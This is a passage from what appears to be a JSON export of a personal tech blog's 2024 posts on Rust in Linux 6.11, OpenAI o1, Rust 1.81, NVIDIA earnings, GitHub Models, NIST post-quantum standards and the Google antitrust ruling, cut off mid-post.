fascinating: the steady expansion of Rust code in the kernel.\nIt\u0026rsquo;s been two years since Rust initially landed in Linux 6.1, and what started as a cautious experiment — limited infrastructure, basic abstractions — is now growing into something that looks increasingly permanent and significant.\nThe State of Rust in 6.11 # The 6.11 release expands Rust\u0026rsquo;s footprint in several ways. There are new abstractions for kernel data structures, improved bindings for device driver development, and continued work on the tooling that makes it possible to write kernel modules in Rust that interoperate cleanly with the existing C codebase.\nPerhaps more importantly, the pace of Rust-related patches has accelerated. The kernel mailing list now regularly includes Rust-related submissions, and the review process — while still rigorous — has become more routine. The initial friction of \u0026ldquo;should we even be doing this?\u0026rdquo; has largely given way to \u0026ldquo;how do we do this well?\u0026rdquo;\nThis matters because the Linux kernel is arguably the most conservative large-scale codebase in the world. Linus Torvalds doesn\u0026rsquo;t accept changes lightly, and the maintainer community has decades of deeply ingrained C practices. The fact that Rust is not only surviving but expanding in this environment says something important about the language\u0026rsquo;s maturity and its value proposition for systems programming.\nWhy Rust in the Kernel Matters # The case for Rust in the kernel has always been about memory safety. The Linux kernel has historically been plagued by classes of bugs — use-after-free, buffer overflows, null pointer dereferences — that are largely eliminated by Rust\u0026rsquo;s ownership model. A study by Google\u0026rsquo;s Android team found that memory safety bugs accounted for roughly 65% of security vulnerabilities in their codebase, and the kernel is no exception.\nBut the value goes beyond just preventing crashes. Memory safety bugs in the kernel are security vulnerabilities. Every use-after-free in a kernel driver is a potential privilege escalation exploit. By writing new drivers and subsystems in Rust, the kernel community can systematically reduce the attack surface of the most critical piece of software on most computing devices.\nThe counterarguments are real, though. Rust introduces build complexity — you now need a Rust compiler in your kernel build toolchain. The language\u0026rsquo;s learning curve is steep, particularly for developers who\u0026rsquo;ve spent decades in C. And the interoperability layer between Rust and C code isn\u0026rsquo;t free — there\u0026rsquo;s cognitive overhead in maintaining clean boundaries between the two.\nI\u0026rsquo;ve heard veteran kernel developers express frustration about this, and I understand it. If you\u0026rsquo;ve been writing C kernel code for twenty years, being told that a new language will make your code safer can feel dismissive of the enormous skill and discipline that\u0026rsquo;s gone into keeping the kernel as stable as it is.\nThe Broader Systems Programming Shift # What\u0026rsquo;s happening in the Linux kernel reflects a broader shift across systems programming. The White House\u0026rsquo;s ONCD (Office of the National Cyber Director) published a report earlier this year explicitly recommending that organizations move toward memory-safe languages for critical infrastructure. CISA has been saying similar things. When government agencies start making language recommendations, you know the conversation has moved beyond academic debate.\nIn my own work, I\u0026rsquo;ve been watching teams adopt Rust for infrastructure tooling — CLI tools, network proxies, embedded systems — and the pattern is remarkably consistent. The initial learning curve is painful, the first few months are slow, and then productivity catches up and the class of bugs that used to consume debugging time simply stops appearing.\nIt\u0026rsquo;s reminiscent of the gradual adoption of type systems in the JavaScript ecosystem. TypeScript faced similar resistance (\u0026ldquo;JavaScript is fine if you\u0026rsquo;re disciplined enough\u0026rdquo;), and now it\u0026rsquo;s effectively the default for serious web development. Rust may follow a similar trajectory for systems work, though the timeline will be longer because the stakes are higher and the existing codebases are larger.\nWhat 6.11 Means Practically # For most Linux users and even most developers, 6.11 is a routine kernel update. You\u0026rsquo;ll get it through your distribution\u0026rsquo;s package manager in due course, and you probably won\u0026rsquo;t notice anything different.\nFor those of us who care about the long-term health of the software ecosystem, though, this release is another data point in an important trend. The kernel — the most critical, most conservative, most scrutinized codebase in open source — is betting on Rust. Not replacing C wholesale, not rewriting everything from scratch, but systematically using a memory-safe language for new development where it makes sense.\nThat\u0026rsquo;s pragmatic engineering, and it\u0026rsquo;s exactly how these transitions should happen.\nMy Take # I\u0026rsquo;ve written C professionally for most of my career, and I have deep respect for what the language enables. But I also have deep respect for evidence, and the evidence is clear: memory safety bugs are the dominant class of security vulnerabilities in systems code, and languages like Rust eliminate them by construction.\nThe Linux kernel\u0026rsquo;s gradual adoption of Rust isn\u0026rsquo;t a rejection of C — it\u0026rsquo;s an acknowledgment that we can do better for new code without throwing away the enormous investment in existing code. That\u0026rsquo;s the right approach, and I\u0026rsquo;m glad to see it gaining momentum with each kernel release.\nIf you\u0026rsquo;re a systems programmer who hasn\u0026rsquo;t tried Rust yet, 6.11 is as good an excuse as any to take a serious look. The language has matured substantially, the tooling is excellent, and the community is welcoming. You might be frustrated for the first few weeks, but I suspect you\u0026rsquo;ll be grateful after the first few months.\nThis post is part of my Developer Landscape series, tracking shifts in the broader software development ecosystem.\n","date":"19 September 2024","externalUrl":null,"permalink":"/posts/240919-linux-kernel-6-11-rust-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux kernel 6.11 ships with expanding Rust support, signaling a real shift in systems programming’s most conservative codebase.","title":"Linux 6.11 Lands — Rust's Growing Presence in the Kernel","type":"posts"},{"content":"Today OpenAI unveiled something genuinely different. Not another GPT iteration with more parameters or a wider context window, but a model that fundamentally changes how it approaches problems. They\u0026rsquo;re calling it o1, and its distinguishing feature is that it reasons through problems step by step before producing an answer — what the research community calls chain-of-thought reasoning, but baked into the model architecture itself rather than tacked on via clever prompting.\nI\u0026rsquo;ve been skeptical of many \u0026ldquo;breakthrough\u0026rdquo; announcements in the AI space over the past couple of years. But after spending a few hours with o1 today, I think this one deserves genuine attention.\nWhat Makes o1 Different # The key innovation is straightforward to describe but profound in its implications: o1 takes time to think. When you give it a complex problem, it doesn\u0026rsquo;t immediately start generating tokens. Instead, it works through an internal chain of reasoning — breaking the problem into steps, considering approaches, checking its own logic — before producing a response.\nOpenAI has released two variants: o1-preview (the more capable model) and o1-mini (a smaller, faster version optimized for STEM reasoning tasks). Both are available through the API and in ChatGPT for Plus and Team subscribers.\nThe benchmarks are striking. On the American Invitational Mathematics Examination (AIME), o1 ranks in the 83rd percentile among students — GPT-4o placed in the 13th. On competitive programming problems from Codeforces, o1 reaches the 89th percentile. On a qualifying exam for the International Physics Olympiad, it solves over 90% of problems correctly.\nBut benchmarks are benchmarks. What matters for those of us building software is how it handles real-world engineering problems.\nThe Developer Experience # In my initial testing, the differences from GPT-4o are most noticeable in multi-step reasoning tasks. Ask o1 to design a database schema with complex relationships and constraints, and it will consider normalization tradeoffs, think about query patterns, and identify potential issues — all before producing its answer.\nThe tradeoff is latency. Where GPT-4o responds almost instantly, o1 can take 10-30 seconds for complex queries as it works through its reasoning chain. For interactive chat, this feels slow. For integration into automated pipelines where you\u0026rsquo;re asking it to solve genuinely hard problems — architecture reviews, complex debugging, algorithm design — the wait is more than justified by the quality improvement.\nOne pattern I\u0026rsquo;m particularly excited about is using o1 for code review in CI/CD pipelines. The reasoning capability means it can trace through execution paths, consider edge cases, and identify logical errors that pattern-matching approaches miss. A colleague already reported that o1-preview caught a subtle race condition in a concurrent Go program that three human reviewers had missed.\nThe o1-mini variant is interesting for a different reason. It\u0026rsquo;s significantly cheaper than o1-preview (about 80% less on the API), and for pure code generation and debugging, it performs nearly as well. If you\u0026rsquo;re building AI-assisted development tools and cost matters — and it always does — o1-mini might be the sweet spot.\nWhat This Means for AI-Assisted Development # I think o1 represents an inflection point in how we integrate AI into development workflows. Previous models were essentially very sophisticated autocomplete — predict the next token based on patterns in training data. That\u0026rsquo;s useful, but it has a ceiling. When you encounter problems that require genuine reasoning — understanding causality, planning multi-step solutions, verifying correctness — pattern matching falls short.\nReasoning models potentially lift that ceiling. Not all the way — o1 still makes mistakes, sometimes confidently — but enough that the range of tasks you can reliably delegate to AI expands meaningfully.\nThe implications for tooling are significant. Right now, most AI coding assistants are optimized for speed — suggestions should appear as fast as you can type. But if reasoning quality matters more than latency for certain tasks, we might see a bifurcation: fast pattern-matching models for inline completion, and slower reasoning models for architecture, review, and complex problem-solving.\nI\u0026rsquo;d also expect the competitive pressure on other labs to be intense. Anthropic, Google, and Meta have all been working on similar capabilities. The fact that OpenAI got here first doesn\u0026rsquo;t mean they\u0026rsquo;ll stay ahead, but it does mean the entire field is now racing toward reasoning as the next frontier.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to distinguish between genuinely important advances and marketing hype. o1 feels like the former. Not because it\u0026rsquo;s perfect — it isn\u0026rsquo;t — but because it changes the fundamental capability of what these models can do.\nThe chain-of-thought approach isn\u0026rsquo;t new in research. What\u0026rsquo;s new is having it work well enough, at scale, to be commercially viable. And that matters because it means reasoning models will be integrated into products and workflows, which means developers need to start thinking about how to use them effectively.\nMy immediate advice: if you\u0026rsquo;re building anything that uses LLMs for complex analysis — code review, bug detection, architecture evaluation, test generation for edge cases — try o1. The latency cost is real, but the quality improvement for reasoning-heavy tasks is substantial enough to change your architecture decisions.\nWe\u0026rsquo;re still in the early days of understanding what reasoning models can and can\u0026rsquo;t do. But today feels like a meaningful step forward, and I\u0026rsquo;m genuinely curious to see where this leads.\nThis post is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering in practice.\n","date":"12 September 2024","externalUrl":null,"permalink":"/posts/240912-openai-o1-reasoning-models/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases o1, a model that ’thinks before it answers’ — what chain-of-thought reasoning means for developers and the future of AI-assisted coding.","title":"OpenAI o1 — The Dawn of Reasoning Models","type":"posts"},{"content":"Rust 1.81.0 landed today, and while it\u0026rsquo;s not a headline-grabbing release, it contains a change that the Rust community has been wanting for years: the Error trait is now available in core. That might sound incremental if you\u0026rsquo;re not deep in the Rust ecosystem, but it\u0026rsquo;s the kind of foundational improvement that makes the language more viable in exactly the environments where it needs to grow.\ncore::error::Error — Why It Matters # Until now, the Error trait lived exclusively in std, which meant it was only available in environments with access to the standard library. If you were writing code for embedded systems, kernels, WebAssembly, or any other no_std context, you couldn\u0026rsquo;t use the Error trait at all. This created a frustrating split in the ecosystem: libraries that wanted to be usable in no_std environments had to avoid Error entirely, often implementing their own ad-hoc error handling patterns.\nWith Rust 1.81, core::error::Error is stabilized. This means no_std libraries can now implement and work with the standard Error trait. The practical impact is significant:\nEmbedded Rust gets proper error handling infrastructure. No more choosing between no_std compatibility and idiomatic error handling. Library authors can implement Error for their error types without forcing std on their users. The ecosystem moves toward a single, unified error handling pattern regardless of target environment. I\u0026rsquo;ve been watching Rust\u0026rsquo;s embedded story develop for a few years now, and this is one of those changes that removes a real papercut. It\u0026rsquo;s not glamorous, but it\u0026rsquo;s the kind of infrastructure work that makes a language mature. Similar foundational improvements are happening across the ecosystem, from Python\u0026rsquo;s free-threading evolution to systems programming advances, where each language focuses on addressing real ecosystem pain points.\n#[expect(lint)] — Better Lint Management # Rust 1.81 also stabilizes the #[expect()] attribute, which is a smarter version of #[allow()]. Where #[allow(unused)] silences a warning indefinitely — even after you fix the underlying issue — #[expect(unused)] tells the compiler \u0026ldquo;I expect this warning to fire here, suppress it.\u0026rdquo; If the warning doesn\u0026rsquo;t fire (because you fixed the code or the lint changed), #[expect()] itself produces a warning, alerting you that the suppression is no longer needed.\nThis is excellent for code hygiene. I\u0026rsquo;ve seen codebases accumulate dozens of stale #[allow()] attributes that were added during development and never cleaned up. #[expect()] makes these self-cleaning: once the suppressed issue is resolved, the attribute tells you to remove it.\n// Old way - this silently stays even after you fix the issue #[allow(unused_variables)] let x = compute_something(); // New way - warns you when the suppression is no longer needed #[expect(unused_variables)] let x = compute_something(); It\u0026rsquo;s a small thing, but it\u0026rsquo;s the kind of thoughtful ergonomic improvement that makes Rust tooling a pleasure to work with — similar to how Python\u0026rsquo;s unified tooling consolidation improves developer experience across different languages.\nLint Sorting and Reason Parameter # Related to lint management, Rust 1.81 stabilizes a reason parameter for lint attributes:\n#[expect(clippy::needless_return, reason = \u0026#34;Explicit returns for clarity in error paths\u0026#34;)] This is documentation for your future self and your teammates. When someone encounters a suppressed lint, they can immediately see why it was suppressed instead of having to dig through git blame and commit messages.\nThe Broader Rust Trajectory # Stepping back from the specific release, I think Rust\u0026rsquo;s trajectory is worth commenting on. The language continues to follow a pattern of steady, incremental improvement rather than dramatic upheaval. Each six-week release adds a few stabilizations, polishes a few rough edges, and occasionally delivers a significant feature.\nCompare this to the landscape two years ago. Async Rust was notoriously painful, the learning curve was steep, and ecosystem fragmentation was a real concern. Today, async Rust is still more complex than async in other languages, but it\u0026rsquo;s dramatically better. The error handling ecosystem has largely converged around thiserror and anyhow. The tooling — rust-analyzer, cargo, clippy — is genuinely world-class.\nThe results show in adoption numbers. The 2023 Stack Overflow survey marked Rust as the most admired language for the eighth consecutive year. More importantly, actual production usage is growing. Linux kernel support, Android adoption, Windows kernel components, AWS (Firecracker, Lambda), Cloudflare Workers — Rust is showing up in serious production infrastructure.\nWhere Rust Still Has Growing to Do # That said, let\u0026rsquo;s be honest about the gaps:\nCompile times remain the most common complaint. Large Rust projects can have punishing incremental build times. The compiler team is making progress (parallel front-end, cranelift backend for debug builds), but it\u0026rsquo;s still a real productivity drag.\nThe learning curve hasn\u0026rsquo;t fundamentally changed. Ownership and borrowing still trip up newcomers, and the borrow checker still occasionally rejects code that you know is correct. Improvements like non-lexical lifetimes and better error messages help, but Rust remains harder to learn than Go, Python, or TypeScript.\nGUI development is still immature compared to other ecosystems. There are promising projects (Iced, Slint, Dioxus), but none have reached the maturity of, say, Qt, Electron, or SwiftUI.\nAsync ecosystem fragmentation is improving but not resolved. The tokio vs async-std split has largely resolved in tokio\u0026rsquo;s favor, but the lack of async traits in stable Rust (coming soon with async fn in traits) still creates friction.\nMy Take # Rust 1.81 is a good release. It\u0026rsquo;s not going to make anyone rewrite their codebase, but the core::error::Error stabilization is the kind of foundational work that enables real ecosystem growth. The #[expect()] attribute is the kind of small, thoughtful feature that makes daily Rust development more pleasant.\nI continue to recommend Rust for systems programming, performance-critical services, and any context where correctness matters more than development speed. It\u0026rsquo;s not the right tool for every job — I wouldn\u0026rsquo;t reach for it to build a CRUD API when Go or even Node.js would get me there faster — but for the domains where it fits, nothing else comes close.\nThe six-week release train keeps delivering. That consistency is Rust\u0026rsquo;s secret weapon.\n","date":"5 September 2024","externalUrl":null,"permalink":"/posts/240905-rust-1-81-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust 1.81 brings the Error trait into core, stabilizes new lint sorting, and continues the language’s steady march toward broader adoption.","title":"Rust 1.81 Drops — Core Error Trait, Sorted Lints, and Why Rust Keeps Getting Better","type":"posts"},{"content":"NVIDIA reported its Q2 FY2025 earnings yesterday, and the numbers are worth pausing on. Revenue hit $30 billion for the quarter — up 122% year-over-year. Data center revenue alone was $26.3 billion, a 154% increase. The company is now worth over $3 trillion.\nI\u0026rsquo;m not a financial analyst, and I have zero interest in stock picks. But as someone who\u0026rsquo;s been building and deploying software infrastructure for three decades, these numbers tell me something important about where our industry is heading. The demand for AI compute is not slowing down — it\u0026rsquo;s accelerating.\nFollowing the Money to Understand the Architecture # When you look at who\u0026rsquo;s buying NVIDIA\u0026rsquo;s GPUs, a pattern emerges. The hyperscalers — Microsoft, Google, Amazon, Meta — are collectively spending tens of billions on GPU clusters. Meta alone has talked about deploying 350,000 H100 GPUs. Microsoft\u0026rsquo;s capital expenditure has ballooned to support Azure AI services and OpenAI\u0026rsquo;s infrastructure needs.\nThis level of spending tells us several things:\nTraining is still compute-hungry: Despite advances in model efficiency, the frontier labs are training ever-larger models that require more compute, not less. The Llama 3.1 405B model that Meta released last month was trained on a cluster of 16,000 H100 GPUs. The next generation will likely require even more.\nInference is becoming the bigger market: As AI features ship in production products — search, code completion, document summarization, image generation — the inference workload is growing exponentially. Every ChatGPT query, every Copilot suggestion, every AI-generated search summary requires GPU compute. Jensen Huang noted that inference now represents about 40% of data center revenue.\nThe supply chain is the bottleneck: NVIDIA\u0026rsquo;s gross margins are above 75%, which in hardware is extraordinary. This pricing power exists because demand far exceeds supply. TSMC\u0026rsquo;s advanced packaging capacity, specifically CoWoS (Chip on Wafer on Substrate), is the physical constraint. Every GPU needs this packaging, and there simply aren\u0026rsquo;t enough production lines.\nWhat This Means for Cloud Costs # If you\u0026rsquo;re deploying AI workloads in the cloud, you\u0026rsquo;ve probably noticed that GPU instances are expensive and often unavailable. This isn\u0026rsquo;t going to get better soon. The demand dynamics suggest that GPU compute will remain a scarce, premium resource for the foreseeable future.\nThis has practical implications for architecture decisions:\nRight-size your model: Running a 70B parameter model when a fine-tuned 7B model would suffice is burning money. The trend toward smaller, specialized models isn\u0026rsquo;t just an academic exercise — it\u0026rsquo;s an economic necessity. I\u0026rsquo;ve seen teams cut their inference costs by 80% by switching from GPT-4-class models to well-tuned smaller models for specific tasks.\nQuantization matters: Techniques like GPTQ and AWQ that reduce model precision from FP16 to INT4 can cut GPU memory requirements by 4x with minimal quality loss. If you\u0026rsquo;re not quantizing your inference models, you\u0026rsquo;re probably over-provisioning.\nBatch your inference: If your workload allows it, batching multiple requests together dramatically improves GPU utilization. A single H100 running one request at a time is catastrophically underutilized. Frameworks like vLLM and TensorRT-LLM handle this automatically, but you need to architect your application to support it.\nThe Blackwell Generation # NVIDIA\u0026rsquo;s next-generation Blackwell GPUs (B100, B200, and the GB200 \u0026ldquo;superchip\u0026rdquo;) are expected to ship later this year and ramp in early 2025. The performance claims are significant: up to 4x faster training and up to 30x faster inference for large language models compared to H100.\nIf those numbers hold even partially, the economics of AI inference could shift meaningfully. Operations that currently require a cluster of H100s might run on a single Blackwell node. That could democratize access to larger models and make AI features viable for smaller companies that currently can\u0026rsquo;t afford the compute.\nBut there\u0026rsquo;s a catch: the initial supply will be constrained, just like H100s were. Early access will go to the hyperscalers and large enterprises with existing purchase agreements. If you\u0026rsquo;re planning your 2025 infrastructure around Blackwell availability, build in contingency plans.\nBeyond NVIDIA: The Competitive Landscape # It\u0026rsquo;s worth noting that NVIDIA isn\u0026rsquo;t the only game in town, even if it feels that way:\nAMD\u0026rsquo;s MI300X is gaining traction, particularly for inference workloads. It offers competitive performance at a lower price point, and major cloud providers are adding MI300X instances.\nGoogle\u0026rsquo;s TPUs continue to be a strong option if you\u0026rsquo;re in the Google Cloud ecosystem. TPU v5e is particularly cost-effective for inference.\nCustom silicon from AWS (Trainium, Inferentia) and Microsoft (Maia) is designed specifically for their cloud customers. These chips won\u0026rsquo;t match NVIDIA\u0026rsquo;s flexibility, but they could offer better price-performance for specific workloads.\nGroq\u0026rsquo;s LPUs and other specialized inference accelerators promise dramatically faster and cheaper inference for specific model architectures.\nMy Take # The NVIDIA earnings story isn\u0026rsquo;t really about NVIDIA — it\u0026rsquo;s about the fundamental reshaping of computing infrastructure. We\u0026rsquo;re in the middle of a build-out that\u0026rsquo;s comparable to the original cloud computing wave. The hyperscalers are effectively building a new tier of compute infrastructure specifically for AI, and the spend is unprecedented.\nFor those of us who design and deploy systems, the practical takeaway is clear: GPU compute is expensive and will remain so. Design your AI features with cost efficiency in mind from day one. Use the smallest model that meets your quality bar, optimize your inference pipeline, and keep an eye on the rapidly evolving hardware landscape.\nThe companies that succeed with AI won\u0026rsquo;t necessarily be the ones with the most GPUs — they\u0026rsquo;ll be the ones that use their GPUs most efficiently. That\u0026rsquo;s always been true with infrastructure, and it\u0026rsquo;s no different now.\n","date":"29 August 2024","externalUrl":null,"permalink":"/posts/240829-nvidia-earnings-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s Q2 FY2025 earnings show 122% year-over-year revenue growth. The numbers reveal where AI infrastructure is heading.","title":"NVIDIA's Q2 Numbers Are Staggering — What It Tells Us About AI Infrastructure Demand","type":"posts"},{"content":"GitHub has quietly launched GitHub Models, a new feature that lets developers experiment with AI models directly from the GitHub platform. Available in public beta, it provides access to models from Meta, Mistral, OpenAI, Microsoft, and others — complete with a playground for testing, API endpoints for integration, and a path to deploy via Azure AI.\nOn the surface, it might seem like yet another AI model catalog. But having spent decades watching how developer tooling evolves, I think this move is more significant than it appears. It\u0026rsquo;s about meeting developers where they are, and that has historically been a winning strategy.\nWhat GitHub Models Actually Offers # The feature is accessible from github.com/marketplace/models and provides three key capabilities:\nInteractive Playground: You can select a model — say Llama 3.1 405B, GPT-4o, or Mistral Large — and immediately start interacting with it. Adjust parameters like temperature, max tokens, and top-p, and see results in real time. No API keys, no setup, no billing configuration. Just pick a model and start prompting.\nAPI Access with GitHub PAT: Each model gets an API endpoint that you can call using your existing GitHub personal access token. This means you can prototype AI integrations in your applications without signing up for yet another service or managing another set of credentials. The API follows the Azure AI inference SDK pattern, so the code is portable.\nCodespaces Integration: With one click, you can spin up a GitHub Codespace pre-configured with sample code for the model you\u0026rsquo;re exploring. This is where the developer experience really shines — you go from \u0026ldquo;I wonder how this model works\u0026rdquo; to \u0026ldquo;I have running code in my IDE\u0026rdquo; in under a minute.\nWhy the Integration Point Matters # I\u0026rsquo;ve been thinking about this from the perspective of developer adoption patterns. There\u0026rsquo;s a well-known principle in developer tools: reduce friction and developers will adopt your platform. GitHub Models reduces friction at exactly the right points.\nConsider the current workflow for experimenting with a new AI model. You typically need to:\nFind the model provider\u0026rsquo;s website Create an account Set up billing (even for free tiers, you usually need a credit card) Generate API keys Install an SDK Write boilerplate code Finally start experimenting GitHub Models collapses steps 2 through 6 into essentially nothing. You already have a GitHub account. You already have a PAT. The playground handles the rest.\nThis matters because the AI landscape is fragmenting rapidly. New models drop every week — Llama variants, Mistral releases, specialized fine-tunes — and keeping up requires evaluating each one against your specific use case. Making that evaluation trivially easy is genuinely valuable.\nThe Strategic Play # Let\u0026rsquo;s be real about what\u0026rsquo;s happening strategically. Microsoft owns GitHub and Azure. GitHub Models is a funnel: experiment for free on GitHub, then deploy to production on Azure AI. It\u0026rsquo;s the same playbook as GitHub Actions leading to Azure DevOps, or GitHub Codespaces leveraging Azure compute.\nThat said, I don\u0026rsquo;t think this is cynical. It\u0026rsquo;s actually good developer experience design. The free tier is genuinely useful for experimentation and prototyping. When you\u0026rsquo;re ready for production — with rate limits, SLAs, and scale — Azure is there as a natural next step. It\u0026rsquo;s a better experience than being asked for a credit card before you can even see if a model fits your needs.\nImplications for the AI Development Workflow # What excites me most is how this could change the way teams evaluate and integrate AI capabilities:\nRapid prototyping: Product managers and developers can quickly test whether a particular model is suitable for a feature before committing to an integration. \u0026ldquo;Will GPT-4o-mini handle our customer support summarization?\u0026rdquo; becomes a five-minute experiment instead of a half-day setup project.\nModel comparison: Having multiple models available through a consistent interface makes A/B testing between models much more practical. Swap out one model for another with a single parameter change and compare outputs.\nEducation and onboarding: Junior developers or team members new to AI can explore models in a familiar environment. The Codespaces integration provides working sample code that serves as both documentation and a starting point.\nStandardized inference API: The use of the Azure AI inference SDK as the common API layer means you\u0026rsquo;re not locked into provider-specific SDKs. Your code structure remains the same whether you\u0026rsquo;re calling a Meta model or an OpenAI model.\nWhat\u0026rsquo;s Missing # It\u0026rsquo;s still early days, and there are gaps. Fine-tuning isn\u0026rsquo;t part of the offering — you\u0026rsquo;re working with base models and whatever system prompts you provide. Rate limits on the free tier are restrictive enough that you can\u0026rsquo;t use this for any production workload. And the model selection, while decent, doesn\u0026rsquo;t include every model you might want to evaluate.\nI\u0026rsquo;d also like to see better tooling for structured evaluation — automated benchmarking against your own test datasets, cost estimation for production use, and latency profiling under load.\nMy Take # GitHub Models is doing what GitHub does best: taking something that requires too many steps and making it feel obvious. The AI model landscape is overwhelming right now, and anything that helps developers quickly evaluate and experiment is welcome.\nWill this replace dedicated ML platforms for serious production workloads? No. But it doesn\u0026rsquo;t need to. It just needs to be the place where developers start their AI exploration journey. And given that 100 million developers are already on GitHub, the distribution advantage is hard to argue with.\nIf you haven\u0026rsquo;t tried it yet, go to the Models marketplace and spend twenty minutes playing with different models. The barrier to entry is essentially zero, and you might discover that a model you hadn\u0026rsquo;t considered is a better fit for your use case than the one you defaulted to.\n","date":"22 August 2024","externalUrl":null,"permalink":"/posts/240822-github-models-ai-marketplace/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub launches Models, a new playground for experimenting with AI models directly from GitHub. Here’s why this integration matters.","title":"GitHub Models — Bringing AI Model Experimentation to Where Developers Already Live","type":"posts"},{"content":"After eight years of evaluation, the National Institute of Standards and Technology (NIST) has officially published its first three finalized post-quantum cryptography (PQC) standards. FIPS 203 (ML-KEM, based on CRYSTALS-Kyber), FIPS 204 (ML-DSA, based on CRYSTALS-Dilithium), and FIPS 205 (SLH-DSA, based on SPHINCS+) are now official standards, ready for implementation.\nIf you\u0026rsquo;ve been treating quantum computing as a distant theoretical concern — and I\u0026rsquo;ll admit I was in that camp for years — this announcement should recalibrate your timeline. When NIST finalizes standards, it means the migration clock is ticking.\nWhy This Matters Now # The common objection I hear is: \u0026ldquo;Quantum computers can\u0026rsquo;t break current encryption yet, so why worry?\u0026rdquo; The answer is a concept called \u0026ldquo;harvest now, decrypt later.\u0026rdquo; Adversaries — state-sponsored and otherwise — are already intercepting and storing encrypted traffic today, with the expectation that future quantum computers will be able to decrypt it.\nIf you\u0026rsquo;re handling data that needs to remain confidential for more than 10-15 years (medical records, financial data, government communications, long-lived signing keys), the data you\u0026rsquo;re encrypting today with RSA or ECDSA might be readable in the future. That\u0026rsquo;s not science fiction; it\u0026rsquo;s the explicit threat model that drove NIST to begin this standardization process back in 2016.\nUnderstanding the Three Standards # Let me break down what was actually standardized, because the naming has been confusing throughout this process:\nFIPS 203 — ML-KEM (Module-Lattice-Based Key-Encapsulation Mechanism) This is your replacement for key exchange. Where you currently use ECDH or RSA key exchange in TLS, SSH, and VPNs, ML-KEM is the post-quantum alternative. It\u0026rsquo;s based on the mathematical hardness of lattice problems, which are believed to be resistant to quantum attacks. Key sizes are larger than what we\u0026rsquo;re used to — ML-KEM-768 public keys are 1,184 bytes compared to 32 bytes for X25519 — but the performance is actually quite reasonable.\nFIPS 204 — ML-DSA (Module-Lattice-Based Digital Signature Algorithm) This replaces RSA and ECDSA for digital signatures. Think code signing, certificate authorities, JWT tokens, and software updates. Again, larger key and signature sizes, but computationally fast. ML-DSA-65 signatures are 3,309 bytes versus 64 bytes for Ed25519.\nFIPS 205 — SLH-DSA (Stateless Hash-Based Digital Signature Algorithm) This is a more conservative alternative for signatures, based on hash functions rather than lattice mathematics. It\u0026rsquo;s slower and produces larger signatures, but its security relies on the well-understood properties of hash functions. Think of it as the \u0026ldquo;belt and suspenders\u0026rdquo; option.\nPractical Impact for Developers # Here\u0026rsquo;s what I\u0026rsquo;d be thinking about if I were planning a migration (and I am):\nTLS and HTTPS: The good news is that most of this will be handled by your TLS library and infrastructure. OpenSSL, BoringSSL, and other libraries are already adding PQC support. Chrome and Firefox have been experimenting with hybrid key exchange (combining classical and post-quantum algorithms) for over a year. Your HTTPS connections may already be partially post-quantum without you knowing it.\nSSH: OpenSSH 9.0 already defaults to a hybrid key exchange that includes a post-quantum component. If you\u0026rsquo;ve updated your SSH installations recently, you might already be covered for key exchange (though not yet for authentication).\nApplication-level cryptography: This is where most developers will need to do actual work. If your application directly uses cryptographic libraries for encryption, signing, or key exchange — think JWT libraries, message encryption, document signing — you\u0026rsquo;ll need to plan a migration path.\nCertificate infrastructure: This is the hard part. The entire PKI ecosystem — certificate authorities, certificate chains, OCSP — needs to transition. Larger certificates mean more bandwidth, and some constrained environments (IoT devices, embedded systems) may struggle with the increased sizes.\nThe Migration Strategy # Don\u0026rsquo;t panic, but do start planning. Here\u0026rsquo;s a reasonable approach:\nInventory your cryptographic dependencies. Know where you\u0026rsquo;re using RSA, ECDSA, ECDH, and AES (AES-256 is already quantum-resistant for symmetric encryption, by the way).\nAdopt crypto-agility. Design your systems so that swapping cryptographic algorithms doesn\u0026rsquo;t require a complete rewrite. Abstract your crypto behind interfaces.\nStart with hybrid approaches. Use both classical and post-quantum algorithms simultaneously. This protects you against quantum threats while maintaining security if the new algorithms turn out to have weaknesses.\nWatch your library ecosystem. Most major cryptographic libraries will handle the heavy lifting. Keep them updated.\nMy Take # I\u0026rsquo;ve been through enough cryptographic transitions — from DES to AES, from SHA-1 to SHA-256, from RSA-1024 to RSA-2048 — to know that these things always take longer than expected. Organizations that start planning now will be fine. Organizations that wait until quantum computers are actually breaking things will be scrambling.\nThe NIST standardization is the starting gun. You don\u0026rsquo;t need to sprint, but you should be lacing up your shoes. Start with an inventory of your cryptographic dependencies, adopt hybrid approaches where your libraries support them, and design for crypto-agility going forward. Your future self — and your future users — will thank you.\n","date":"15 August 2024","externalUrl":null,"permalink":"/posts/240815-nist-post-quantum-cryptography/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NIST has published its first three finalized post-quantum cryptography standards. Here’s what developers need to know and do.","title":"NIST Finalizes Post-Quantum Cryptography Standards — Time to Start Planning","type":"posts"},{"content":"This week, Judge Amit Mehta of the U.S. District Court for the District of Columbia ruled that Google has illegally maintained a monopoly in the search engine market. It\u0026rsquo;s one of the most significant antitrust decisions in technology since the Microsoft case in the late 1990s — and for those of us who build on the web, the implications could be far-reaching.\nHaving been in this industry long enough to remember the Microsoft browser wars, I can tell you that antitrust rulings like this don\u0026rsquo;t just affect the company in question. They reshape entire ecosystems.\nThe Core of the Ruling # The ruling centers on Google\u0026rsquo;s practice of paying enormous sums — reportedly around $26 billion in 2021 alone — to be the default search engine on browsers, phones, and other devices. Apple\u0026rsquo;s Safari, Mozilla Firefox, and virtually every Android device funnel users to Google Search by default. The court found that these exclusive deals effectively locked out competition, not because Google\u0026rsquo;s product was inherently superior, but because the defaults created an insurmountable distribution advantage.\nFrom a technical standpoint, this is fascinating. Google\u0026rsquo;s search quality is genuinely good — nobody disputes that. But the ruling suggests that even excellent products can become monopolistic when distribution agreements prevent meaningful competition. The network effects are real: more users mean more data, more data means better algorithms, better algorithms mean more users.\nWhat This Means for the Web Platform # If you\u0026rsquo;re a web developer, you should be paying attention. Google\u0026rsquo;s dominance in search has had cascading effects on how we build websites:\nSEO as a monoculture: We\u0026rsquo;ve all been optimizing for a single search engine. Our sitemaps, structured data, Core Web Vitals — all of it is effectively designed around Google\u0026rsquo;s ranking 